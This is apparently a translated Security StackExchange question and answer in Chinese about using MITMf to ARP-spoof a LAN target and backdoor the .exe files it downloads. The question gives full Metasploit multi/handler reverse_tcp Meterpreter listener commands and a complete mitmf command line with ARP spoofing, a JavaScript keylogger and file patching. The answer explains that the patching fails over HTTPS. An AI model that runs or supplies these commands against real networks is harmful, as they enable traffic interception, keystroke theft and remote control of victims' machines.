从这个教程中,我发现可以使用工具MITMf来修补exe文件的“受害者”下载,以便打开计量器外壳。已使用的命令如下:
use exploit/multi/handler
set payloads windows/metepreter/reverse_tcp
set lhost 192.168.1.4
set lport 4888
exploit打开计量器
mitmf -i eth0 --arp --spoof --gateway 192.168.1.1 --target 192.168.1.8 --jskeylogger --filepwn问题是它没有像教程中提到的那样修补所有的exe文件。所以问题是它修补了哪些文件,哪些没有??
发布于 2016-03-11 20:17:15
PLease检查此问题:https://github.com/byt3bl33d3r/MITMf/issues/280
MITMF使用BDProxy来修补文件,但它只适用于非ssl连接.你能检查一下你是否试图通过HTTPS下载一个文件吗?
有关更多信息,请查看文档:https://github.com/secretsquirrel/BDFProxy。
https://security.stackexchange.com/questions/116624
复制相似问题